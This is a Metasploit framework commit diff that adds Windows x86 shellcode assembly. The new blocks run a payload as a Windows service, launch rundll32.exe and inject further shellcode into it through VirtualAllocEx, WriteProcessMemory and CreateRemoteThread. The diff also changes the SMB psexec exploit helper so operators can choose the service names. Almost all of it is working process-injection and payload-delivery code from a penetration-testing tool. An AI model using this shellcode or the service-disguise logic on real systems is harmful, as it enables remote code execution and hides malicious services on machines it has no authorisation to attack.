Land rapid7#2657, Dynamic generation of windows service executable functions

Meatballs1 · Meatballs1 · commit bf1a66525923 · 2014-06-07T13:28:20.000+01:00
Allows a user to specify non service executables as EXE::Template as
long as the file has enough size to store the payload.
diff --git a/external/source/shellcode/windows/x86/src/block/block_create_remote_process.asm b/external/source/shellcode/windows/x86/src/block/block_create_remote_process.asm
@@ -0,0 +1,82 @@
+;-----------------------------------------------------------------------------;
+; Author: agix (florian.gaultier[at]gmail[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Size: 307 bytes
+;-----------------------------------------------------------------------------;
+
+[BITS 32]
+; Input: EBP must be the address of 'api_call'.
+
+xor edi, edi
+push 0x00000004 ;PAGE_READWRITE
+push 0x00001000 ;MEM_COMMIT
+push 0x00000054 ;STARTUPINFO+PROCESS_INFORMATION
+push edi 
+push 0xE553A458 ;call VirtualAlloc() 
+call ebp
+
+mov dword [eax], 0x44
+lea esi, [eax+0x44]
+push edi
+push 0x6578652e
+push 0x32336c6c
+push 0x646e7572
+mov ecx, esp	;"rundll32.exe"
+push esi		;lpProcessInformation
+push eax		;lpStartupInfo
+push edi		;lpCurrentDirectory
+push edi		;lpEnvironment
+push 0x00000044	;dwCreationFlags
+push edi		;bInheritHandles
+push edi		;lpThreadAttributes
+push edi		;lpProcessAttributes
+push ecx		;lpCommandLine
+push edi		;lpApplicationName
+push 0x863FCC79
+call ebp 		;call CreatProcessA()
+
+mov ecx, [esi]
+push 0x00000040 ;PAGE_EXECUTE_READWRITE
+push 0x00001000 ;MEM_COMMIT
+push 0x00001000	;Next Shellcode Size
+push edi
+push ecx		;hProcess
+push 0x3F9287AE ;call VirtualAllocEx()
+call ebp
+
+call me2
+me2:
+pop edx
+
+mov edi, eax
+mov ecx, [esi]
+add dword edx, 0x112247   ;pointer on the next shellcode
+push esp
+push 0x00001000	;Next Shellcode Size
+push edx		;
+push eax		;lBaseAddress
+push ecx		;hProcess
+push 0xE7BDD8C5
+call ebp 		;call WriteProcessMemory()
+
+xor eax, eax
+mov ecx, [esi]
+push eax		;lpThreadId
+push eax		;dwCreationFlags
+push eax		;lpParameter
+push edi		;lpStartAddress
+push eax		;dwStackSize
+push eax		;lpThreadAttributes
+push ecx		;hProcess
+push 0x799AACC6
+call ebp 		;call CreateRemoteThread()
+
+mov ecx, [esi]
+push ecx
+push 0x528796C6
+call ebp 		;call CloseHandle()
+
+mov ecx, [esi+0x4]
+push ecx
+push 0x528796C6
+call ebp 		;call CloseHandle()
diff --git a/external/source/shellcode/windows/x86/src/block/block_service.asm b/external/source/shellcode/windows/x86/src/block/block_service.asm
@@ -0,0 +1,64 @@
+;-----------------------------------------------------------------------------;
+; Author: agix (florian.gaultier[at]gmail[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Size: 448 bytes
+;-----------------------------------------------------------------------------;
+
+[BITS 32]
+; Input: EBP must be the address of 'api_call'.
+
+push byte 0x0
+push 0x32336970
+push 0x61766461
+push esp
+push 0x726774c
+call ebp		;load advapi32.dll
+push 0x00454349
+push 0x56524553
+mov ecx, esp	;ServiceTableEntry.SVCNAME
+lea eax, [ebp+0xd0];ServiceTableEntry.SvcMain
+push 0x00000000
+push eax
+push ecx
+mov eax,esp
+push 0x00000000
+push eax
+push 0xCB72F7FA
+call ebp		;call StartServiceCtrlDispatcherA(ServiceTableEntry)
+push 0x00000000
+push 0x56A2B5F0
+call ebp		;call ExitProcess(0)
+pop eax			;SvcCtrlHandler
+pop eax
+pop eax
+pop eax
+xor eax,eax
+ret
+cld 			;SvcMain
+call me
+me:
+pop ebp
+sub ebp, 0xd6	;ebp => hashFunction
+push 0x00464349
+push 0x56524553
+mov ecx, esp	;SVCNAME
+lea eax, [ebp+0xc9];SvcCtrlHandler
+push 0x00000000
+push eax
+push ecx
+push 0x5244AA0B
+call ebp		;RegisterServiceCtrlHandlerExA
+push 0x00000000
+push 0x00000000
+push 0x00000000
+push 0x00000000
+push 0x00000000
+push 0x00000000
+push 0x00000004
+push 0x00000010
+mov ecx, esp
+push 0x00000000
+push ecx
+push eax
+push 0x7D3755C6
+call ebp		;SetServiceStatus RUNNING
diff --git a/external/source/shellcode/windows/x86/src/block/block_service_change_description.asm b/external/source/shellcode/windows/x86/src/block/block_service_change_description.asm
@@ -0,0 +1,41 @@
+;-----------------------------------------------------------------------------;
+; Author: agix (florian.gaultier[at]gmail[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Size: 448 bytes
+;-----------------------------------------------------------------------------;
+
+[BITS 32]
+; Input: EBP must be the address of 'api_call'.
+
+push 0x000F003F
+push 0x00000000
+push 0x00000000
+push 0x7636F067
+call ebp 		;OpenSCManagerA
+mov edi, eax
+push 0x00464349
+push 0x56524553
+mov ecx, esp	;SVCNAME
+push 0x000F01FF
+push ecx
+push eax
+push 0x404B2856
+call ebp 		;OpenServiceA
+mov esi, eax
+push 0x00464349
+push 0x56524553
+mov ecx, esp
+push 0x00000000
+push ecx
+mov ecx, esp	;SVCDESCRIPTION
+push ecx
+push 0x00000001 ;SERVICE_CONFIG_DESCRIPTION
+push eax
+push 0xED35B087
+call ebp 		;ChangeServiceConfig2A
+push esi
+push 0xAD77EADE	;CloseServiceHandle
+call ebp
+push edi
+push 0xAD77EADE	;CloseServiceHandle
+call ebp
diff --git a/external/source/shellcode/windows/x86/src/block/block_service_stopped.asm b/external/source/shellcode/windows/x86/src/block/block_service_stopped.asm
@@ -0,0 +1,45 @@
+;-----------------------------------------------------------------------------;
+; Author: agix (florian.gaultier[at]gmail[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Size: 448 bytes
+;-----------------------------------------------------------------------------;
+
+[BITS 32]
+; Input: EBP must be the address of 'api_call'.
+
+call me3
+me3:
+pop edi
+jmp 0x7
+pop eax
+pop eax
+pop eax
+pop eax
+xor eax,eax
+ret
+push 0x00464349
+push 0x56524553
+mov ecx, esp	;SVCNAME
+lea eax, [edi+0x3];SvcCtrlHandler
+push 0x00000000
+push eax
+push ecx
+push 0x5244AA0B
+call ebp		;RegisterServiceCtrlHandlerExA
+push 0x00000000
+push 0x00000000
+push 0x00000000
+push 0x00000000
+push 0x00000000
+push 0x00000000
+push 0x00000001
+push 0x00000010
+mov ecx, esp
+push 0x00000000
+push ecx
+push eax
+push 0x7D3755C6
+call ebp		;SetServiceStatus RUNNING
+push 0x0
+push 0x56a2b5f0
+call ebp 		;ExitProcess
diff --git a/external/source/shellcode/windows/x86/src/single/single_create_remote_process.asm b/external/source/shellcode/windows/x86/src/single/single_create_remote_process.asm
@@ -0,0 +1,16 @@
+;-----------------------------------------------------------------------------;
+; Author: agix (florian.gaultier[at]gmail[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Size: 307 bytes
+; Build: >build.py single_create_remote_process
+;-----------------------------------------------------------------------------;
+
+[BITS 32]
+[ORG 0]
+
+  cld                    ; Clear the direction flag.
+  call start             ; Call start, this pushes the address of 'api_call' onto the stack.
+%include "./src/block/block_api.asm"
+start:                   ;
+  pop ebp                ; pop off the address of 'api_call' for calling later.
+%include "./src/block/block_create_remote_process.asm"
diff --git a/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm b/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm
@@ -0,0 +1,23 @@
+;-----------------------------------------------------------------------------;
+; Author: agix (florian.gaultier[at]gmail[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Size: 448 bytes
+; Build: >build.py single_service_stuff
+;-----------------------------------------------------------------------------;
+
+[BITS 32]
+[ORG 0]
+
+  cld                    ; Clear the direction flag.
+  call start             ; Call start, this pushes the address of 'api_call' onto the stack.
+%include "./src/block/block_api.asm"
+start:                   ;
+  pop ebp                ; pop off the address of 'api_call' for calling later.
+%include "./src/block/block_service.asm"
+%include "./src/block/block_service_change_description.asm"
+%include "./src/block/block_create_remote_process.asm"
+%include "./src/block/block_service_stopped.asm"
+
+push edi
+push 0x56A2B5F0
+call ebp		;call ExitProcess(0)
diff --git a/lib/msf/core/exploit/smb/psexec.rb b/lib/msf/core/exploit/smb/psexec.rb
@@ -51,8 +51,11 @@ def smb_read_file(smbshare, host, file)
   #   instead of all the ghetto "rescue ::Exception" madness
   # @param command [String] Should be a valid windows command
   # @param disconnect [Boolean] Disconnect afterwards
+  # @param service_description [String] Service Description
+  # @param service_name [String] Service Name
+  # @param display_name [Strnig] Display Name
   # @return [Boolean] Whether everything went well
-  def psexec(command, disconnect=true, service_description=nil)
+  def psexec(command, disconnect=true, service_description=nil, service_name=nil, display_name=nil)
     simple.connect("\\\\#{datastore['RHOST']}\\IPC$")
     handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"])
     vprint_status("#{peer} - Binding to #{handle} ...")
@@ -70,8 +73,8 @@ def psexec(command, disconnect=true, service_description=nil)
       print_error("#{peer} - Error getting scm handle: #{e}")
       return false
     end
-    servicename = Rex::Text.rand_text_alpha(11)
-    displayname = Rex::Text.rand_text_alpha(16)
+    servicename = service_name || Rex::Text.rand_text_alpha(11)
+    displayname = display_name || Rex::Text.rand_text_alpha(16)
 
     svc_handle = nil
     svc_status = nil
diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb
diff --git a/modules/exploits/windows/smb/psexec.rb b/modules/exploits/windows/smb/psexec.rb
